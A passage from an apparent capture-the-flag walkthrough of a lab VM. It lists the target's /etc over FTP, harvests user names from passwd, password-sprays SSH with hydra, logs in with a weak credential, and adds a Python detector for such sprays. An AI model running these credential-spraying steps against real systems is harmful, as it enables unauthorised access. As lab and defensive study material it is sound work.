<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 96 Apr 20 23:09 environment</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 132 Feb 11 00:47 ftpusers</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 280 Jun 20 2014 fuse.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2584 Feb 18 18:54 gai.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-rw-r-- 1 0 0 1253 Jun 04 20:13 group</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 1240 Jun 03 21:49 group-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:07 grub.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 0 42 1004 Jun 04 20:13 gshadow</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 995 Jun 03 21:49 gshadow-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 gss</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 92 Oct 22 2015 host.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 12 Jun 03 13:57 hostname</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 469 Jun 05 16:38 hosts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 411 Jun 03 13:51 hosts.allow</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 711 Jun 03 13:51 hosts.deny</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1257 Jun 03 18:01 inetd.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Feb 06 22:02 inetd.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 init</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 init.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:49 initramfs-tools</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1748 Feb 04 18:17 inputrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:49 insserv</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 771 Mar 06 2015 insserv.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 19:20 insserv.conf.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 iproute2</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:05 iptables</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:48 iscsi</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 345 Jun 09 21:08 issue</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 197 Jun 03 23:26 issue.net</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 kbd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 kernel</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 144 Jun 03 13:53 kernel-img.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 26754 Jun 07 01:56 ld.so.cache</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 34 Jan 27 15:17 ld.so.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 07 01:57 ld.so.conf.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 ldap</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 267 Oct 22 2015 legal</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 191 Jan 19 00:16 libaudit.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 libnl-3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 06 23:17 lighttpd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2995 Apr 14 23:09 locale.alias</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 9149 Jun 03 13:49 locale.gen</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 3687 Jun 03 13:49 localtime</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 6 0 0 4096 Jun 03 14:17 logcheck</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 10551 Mar 29 10:25 login.defs</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 703 May 06 2015 logrotate.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 00:01 logrotate.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 103 Apr 12 21:12 lsb-release</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 lvm</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-r--r--r-- 1 0 0 33 Jun 03 13:54 machine-id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 111 Nov 20 2015 magic</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 111 Nov 20 2015 magic.mime</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2579 Jun 04 00:29 mailcap</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 449 Oct 30 2015 mailcap.order</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 mdadm</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 24241 Oct 30 2015 mime.types</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 967 Oct 30 2015 mke2fs.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 modprobe.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 195 Apr 20 23:09 modules</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 modules-load.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 19 Jun 03 13:54 mtab -> ../proc/self/mounts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 06 22:16 mysql</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 7 0 0 4096 Jun 03 13:49 network</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 91 Oct 22 2015 networks</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 newt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 497 May 04 2014 nsswitch.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Apr 20 23:08 opt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 21 Jun 03 13:49 os-release -> ../usr/lib/os-release</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 6595 Jun 23 2015 overlayroot.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 552 Mar 16 19:09 pam.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 21:49 pam.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 2869 Jun 03 23:10 passwd-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:51 perl</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 14:17 php</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 06 23:17 phpmyadmin</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 pm</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 polkit-1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 19:20 postfix</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 ppp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 575 Oct 22 2015 profile</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 profile.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2932 Oct 25 2014 protocols</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:38 python</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 14:38 python2.7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 python3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 python3.5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 0 0 472 Jun 06 17:32 rc.local</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc0.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc1.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc2.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc3.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc4.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc5.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 21:40 rc6.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 06 22:41 rcS.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 23 Jun 09 21:08 resolv.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 06 23:17 resolvconf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 887 Oct 25 2014 rpc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1371 Jan 27 23:42 rsyslog.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 19:20 rsyslog.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 09 21:07 samba</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 4038 Mar 29 10:25 securetty</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 security</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 selinux</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 19605 Oct 25 2014 services</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 sgml</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 0 42 4518 Jun 05 17:59 shadow</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 1873 Jun 03 23:10 shadow-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 125 Jun 03 15:20 shells</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 skel</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 04 20:15 ssh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 20:17 ssl</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 644 Jun 04 20:13 subgid</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 625 Jun 03 14:46 subgid-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 644 Jun 04 20:13 subuid</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 0 0 625 Jun 03 14:46 subuid-</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-r--r----- 1 0 0 769 Jun 05 18:01 sudoers</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 sudoers.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 2227 Jun 03 15:22 sysctl.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 sysctl.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 5 0 0 4096 Jun 03 13:49 systemd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 terminfo</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 14 Jun 03 13:49 timezone</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Apr 12 11:30 tmpfiles.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 1260 Mar 16 21:58 ucf.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 udev</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ufw</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 23:15 update-motd.d</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:52 update-notifier</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 vim</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:54 vmware-tools</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 278 Jun 03 23:48 vsftpd.banner</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 0 Jun 03 23:22 vsftpd.chroot_list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 5961 Jun 04 20:15 vsftpd.conf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 0 Jun 03 23:21 vsftpd.user_list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lrwxrwxrwx 1 0 0 23 Jun 03 13:49 vtrgb -> /etc/alternatives/vtrgb</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 0 0 4942 Jan 08 14:18 wgetrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 xdg</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 xml</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 0 0 4096 Jun 03 15:20 zsh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">226 Directory send OK.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ftp> </span><br />
<br />
The listing looks like the contents of the '/etc' directory. I collected the users with a login shell from the 'passwd' file.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# cat passwd | grep '/bin/bash' | cut -d: -f1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">RNunemaker</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ETollefson</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">DSwanger</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">AParnell</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MBassin</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">JBare</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">LSolum</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MFrei</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SStroud</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">JKanode</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CJoo</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Drew</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jess</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHAY</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mel</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">zoe</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">NATHAN</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">elly</span><br />
<br />
Then I ran hydra against the SSH service with the '-e nsr' option, which tries a null password, the login name itself and the login name reversed for every user in the list.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~# hydra -L user-list.txt -e nsr 192.168.1.3 ssh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-09 13:11:15</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] max 16 tasks per 1 server, overall 64 tasks, 84 login tries (l:28/p:3), ~0 tries per task</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[DATA] attacking service ssh on port 22</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[22][ssh] host: 192.168.1.3 login: SHayslett password: SHayslett</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[STATUS] 85.00 tries/min, 85 tries in 00:01h, 4294967295 todo in 00:01h, 16 active</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[STATUS] 28.33 tries/min, 85 tries in 00:03h, 4294967295 todo in 1193046:29h, 16 active</span><br />
<br />
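As an added example that is not part of the original post, here is the defender's counterpart of the hydra run above: a scan over sshd auth-log lines that flags a single source trying a few passwords against many logins in a short window (the shape of a '-L user-list -e nsr' run) and records whether any login from that source then succeeded. The log lines, hostname, source addresses and thresholds are constructed for this example; the login names are the ones harvested from 'passwd' above.

```python
"""Flag an SSH password spray in sshd auth-log lines and note any success
that follows it. Sample lines below are constructed for this example."""
import re
from collections import defaultdict
from datetime import datetime

# sshd lines as rsyslog writes them to /var/log/auth.log (no year in the stamp)
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted password for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ts(ts, year):
    # syslog timestamps carry no year, so the caller supplies it
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def analyze(lines, window_s=60, min_failures=20, min_users=5, year=2016):
    """Return {source_ip: finding} for every source that, inside some
    window_s-second window, produced >= min_failures failed logins against
    >= min_users distinct login names. A low tries-per-user ratio is the
    spray signature: per-account lockouts never trigger on it, so the
    detection has to key on the source, not the account."""
    failures = defaultdict(list)   # ip -> [(time, user)]
    successes = defaultdict(list)  # ip -> [(time, user)]
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append((parse_ts(m["ts"], year), m["user"]))
            continue
        m = ACCEPTED_RE.match(line)
        if m:
            successes[m["ip"]].append((parse_ts(m["ts"], year), m["user"]))

    findings = {}
    for ip, events in failures.items():
        events.sort()
        best = None  # (failure count, users, window start) of the densest window
        start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            window = events[start:end + 1]
            users = {u for _, u in window}
            if len(window) >= min_failures and len(users) >= min_users:
                if best is None or len(window) > best[0]:
                    best = (len(window), users, window[0][0])
        if best:
            count, users, first = best
            findings[ip] = {
                "failures": count,
                "users": sorted(users),
                "tries_per_user": round(count / len(users), 1),
                # accepted logins from the same source after the spray began
                "compromised": sorted(u for t, u in successes.get(ip, []) if t >= first),
            }
    return findings


# Constructed sample: one source tries 3 passwords per login for 8 logins in
# about 25 seconds, then one of those logins succeeds; a second, unrelated
# source has a single typo-style failure that must not be flagged.
SAMPLE_USERS = ["RNunemaker", "ETollefson", "DSwanger", "AParnell",
                "SHayslett", "MBassin", "JBare", "LSolum"]
SAMPLE_LOG = [
    "Jun  9 13:10:02 red sshd[1990]: Failed password for invalid user admin from 10.0.0.7 port 51000 ssh2",
    "Jun  9 13:10:09 red sshd[1991]: Accepted password for zoe from 10.0.0.7 port 51001 ssh2",
]
for i, user in enumerate(u for u in SAMPLE_USERS for _ in range(3)):
    SAMPLE_LOG.append(
        f"Jun  9 13:11:{15 + i:02d} red sshd[{2000 + i}]: Failed password for {user} "
        f"from 192.168.1.5 port {40000 + i} ssh2")
SAMPLE_LOG.append(
    "Jun  9 13:11:40 red sshd[2100]: Accepted password for SHayslett from 192.168.1.5 port 40100 ssh2")

if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG).items():
        print(ip, finding)
```

The key field is "tries_per_user": a value near 3 with many users is a spray from a harvested user list, whereas hundreds of tries against one or two users is a classic single-account brute force.
<br />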
And we have one SSH account. Let's log in.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Documents# ssh SHayslett@192.168.1.3</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-----------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ Barry, don't forget to put a message here ~</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-----------------------------------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@192.168.1.3's password: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Welcome back!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 3 SHayslett SHayslett 4096 Jun 9 23:41 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 32 root root 4096 Jun 4 20:13 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 5 Jun 5 18:24 .bash_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 SHayslett SHayslett 220 Sep 1 2015 .bash_logout</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 SHayslett SHayslett 3771 Sep 1 2015 .bashrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwx------ 2 SHayslett SHayslett 4096 Jun 9 23:41 .cache</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 SHayslett SHayslett 675 Sep 1 2015 .profile</span><br />
